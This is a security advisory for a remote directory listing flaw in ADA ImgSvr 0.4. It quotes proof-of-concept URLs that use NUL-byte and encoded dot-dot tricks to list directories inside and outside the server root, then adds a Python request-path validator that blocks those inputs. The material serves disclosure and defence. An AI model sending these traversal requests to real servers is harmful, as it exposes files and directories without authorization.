ADA IMGSVR Remote Directory Listing Vulnerability
BID:10026
Info
| Bugtraq ID: | 10026 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 01 2004 12:00AM |
| Updated: | Apr 01 2004 12:00AM |
| Credit: | Discovery of this issue is credited to "Donato Ferrante" <[email protected]> and Dr_insane <[email protected]>. |
| Vulnerable: | ADA ImgSvr 0.4 |
| Not Vulnerable: | |
Discussion
A vulnerability has been reported in the ImgSvr server software that may allow a remote user to disclose directory listings under the server root. The issue has also been reported to allow listing of directories that reside outside the server root.
An attacker may leverage this issue to gain access to sensitive information by disclosing directory listings; information disclosed in this way could lead to further attacks against the target system.
Exploit / POC
There is no exploit required to leverage this issue. The following proof of concept has been provided:
For listing directories inside the server root (provided by Donato Ferrante):
http://www.example.org:1234/%00/
http://www.example.org:1234/someDirectory%00/
http://www.example.org:1234/someDirectory/%00/
For listing directories outside of the server root (provided by Dr_insane):
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
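Since no vendor patch is listed, the practical question for a defender is what input validation the advisory implies is missing: the proof-of-concept paths rely on a NUL byte (%00) and on percent-encoded dot-dot segments (%2f%2e%2e%2f) surviving into filesystem access. The following Python example is added here and is not ADA's code; it is a request-path validator that percent-decodes once, rejects NUL bytes before any filesystem call, canonicalizes the result against the document root, and refuses to serve directories at all, so no listing can be generated. The document root, its files and the `resolve_request_path` / `check_paths` names are constructed for the example; the proof-of-concept paths are the ones quoted in this advisory.

```python
import os
import tempfile
from urllib.parse import unquote


class PathRejected(Exception):
    """Raised when a request path fails validation; the message is the reason."""


def resolve_request_path(doc_root: str, raw_path: str) -> str:
    """Map a URL path onto a regular file under doc_root, or raise PathRejected.

    Checks, in order:
      1. percent-decode exactly once (the PoC uses %00, %2f and %2e);
      2. reject NUL bytes, which C-style string handling silently truncates on;
      3. canonicalize and require the result to stay inside doc_root;
      4. refuse directories outright, so a listing is never produced.
    """
    decoded = unquote(raw_path)
    if "\x00" in decoded:
        raise PathRejected("NUL byte in path")
    root = os.path.realpath(doc_root)
    # lstrip so os.path.join does not treat the URL path as an absolute path
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # realpath has collapsed any ../ segments; the result must remain under root
    if candidate != root and not candidate.startswith(root + os.sep):
        raise PathRejected("path escapes document root")
    if os.path.isdir(candidate):
        raise PathRejected("directory listing disabled")
    if not os.path.isfile(candidate):
        raise PathRejected("not found")
    return candidate


# Proof-of-concept paths quoted in the advisory (query host/port omitted)
POC_PATHS = [
    "/%00/",
    "/someDirectory%00/",
    "/someDirectory/%00/",
    "/%2f%2e%2e%2f%2f%2e%2e%2f/",
]


def check_paths(doc_root: str, paths):
    """Return {path: verdict} for each request path, without raising."""
    results = {}
    real_root = os.path.realpath(doc_root)
    for p in paths:
        try:
            served = resolve_request_path(doc_root, p)
            results[p] = "ok:" + os.path.relpath(served, real_root)
        except PathRejected as exc:
            results[p] = "rejected: " + str(exc)
    return results


def make_demo_root() -> str:
    """Build a throwaway document root (constructed layout for this example)."""
    root = tempfile.mkdtemp(prefix="imgsvr-demo-")
    os.makedirs(os.path.join(root, "someDirectory"))
    with open(os.path.join(root, "someDirectory", "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff")  # constructed placeholder bytes, not a real image
    return root


if __name__ == "__main__":
    demo_root = make_demo_root()
    probes = POC_PATHS + ["/someDirectory/photo.jpg", "/someDirectory/", "/"]
    for path, verdict in check_paths(demo_root, probes).items():
        print(f"{path:32} {verdict}")
```

Two design points matter here: the NUL check runs before any filesystem call, because on some platforms a path containing a NUL raises an exception rather than being truncated, and the containment check compares canonical (realpath) strings with a trailing separator so that a sibling directory whose name merely starts with the root name is not accepted as "inside".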
References
References:
- ImgSvr Home Page (ADA)
- Index viewing in imgSvr 0.4 ("Donato Ferrante")